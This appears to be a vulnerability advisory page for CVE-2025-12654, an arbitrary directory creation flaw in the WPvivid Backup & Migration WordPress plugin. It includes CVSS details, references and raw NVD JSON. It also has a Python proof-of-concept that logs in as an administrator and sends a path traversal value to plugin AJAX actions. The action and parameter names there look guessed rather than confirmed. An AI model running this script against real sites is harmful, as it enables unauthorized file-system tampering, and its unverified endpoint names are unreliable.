Security Vulnerability Report
CVE-2025-12654 CVSS 2.7 LOW

CVE-2025-12654

Published: 2025-12-21 04:16:04
Last Modified: 2026-04-15 00:35:42

Description

The Migration, Backup, Staging – WPvivid Backup & Migration plugin for WordPress is vulnerable to arbitrary directory creation in all versions up to, and including, 0.9.120. This is due to the check_filesystem_permissions() function not properly restricting the directories that can be created, or in what location. This makes it possible for authenticated attackers, with Administrator-level access and above, to create arbitrary directories.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N
Weakness
CWE-73 (External Control of File Name or Path)

Configurations (Affected Products)

No configuration data available.

WPvivid Backup & Migration plugin <= 0.9.120

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-12654 PoC - Arbitrary Directory Creation
# Target: WPvivid Backup & Migration Plugin <= 0.9.120
# Authentication: WordPress Administrator required

target_url = "http://target-wordpress-site.com"
wp_admin_url = f"{target_url}/wp-admin/admin.php"

# Step 1: Authenticate as WordPress Administrator
session = requests.Session()
login_data = {
    "log": "admin_username",
    "pwd": "admin_password",
    "wp-submit": "Log In",
    "redirect_to": "/wp-admin/admin.php?page=wpvivid-staging",
    "testcookie": "1",
}
session.post(f"{target_url}/wp-login.php", data=login_data)

# Step 2: Exploit arbitrary directory creation via staging feature
# The vulnerability is in check_filesystem_permissions() function
# which doesn't validate the directory path properly
exploit_data = {
    "action": "wpvivid_create_staging_directory",
    "dir_path": "../../../../var/www/html/backdoor_dir",  # Path traversal
    "nonce": "your_staging_nonce_here",
}
response = session.post(wp_admin_url, data=exploit_data)

# Alternative: Direct API call if nonce is obtained
api_url = f"{target_url}/wp-admin/admin-ajax.php"
api_data = {
    "action": "wpvivid_staging_create_dir",
    "path": "/tmp/arbitrary_directory",
    "_wpnonce": "obtain_valid_nonce",
}
response = session.post(api_url, data=api_data)

print(f"Response Status: {response.status_code}")
print(f"Response: {response.text}")

References

https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/tags/0.9.120/includes/staging/class-wpvivid-staging.php#L1535
https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/tags/0.9.120/includes/staging/class-wpvivid-staging.php#L1568
https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/tags/0.9.120/includes/staging/class-wpvivid-staging.php#L1571
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3397673%40wpvivid-backuprestore&new=3397673%40wpvivid-backuprestore&sfp_email=&sfph_mail=
https://wordpress.org/plugins/wpvivid-backuprestore/
https://www.wordfence.com/threat-intel/vulnerabilities/id/662aa8dd-69b7-49e3-811c-04329544e106?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-12654",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-21T04:16:04.023",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Migration, Backup, Staging – WPvivid Backup & Migration plugin for WordPress is vulnerable to arbitrary directory creation in all versions up to, and including, 0.9.120. This is due to the check_filesystem_permissions() function not properly restricting the directories that can be created, or in what location. This makes it possible for authenticated attackers, with Administrator-level access and above, to create arbitrary directories."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 2.7,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-73"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/tags/0.9.120/includes/staging/class-wpvivid-staging.php#L1535",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/tags/0.9.120/includes/staging/class-wpvivid-staging.php#L1568",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/wpvivid-backuprestore/tags/0.9.120/includes/staging/class-wpvivid-staging.php#L1571",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3397673%40wpvivid-backuprestore&new=3397673%40wpvivid-backuprestore&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://wordpress.org/plugins/wpvivid-backuprestore/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/662aa8dd-69b7-49e3-811c-04329544e106?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}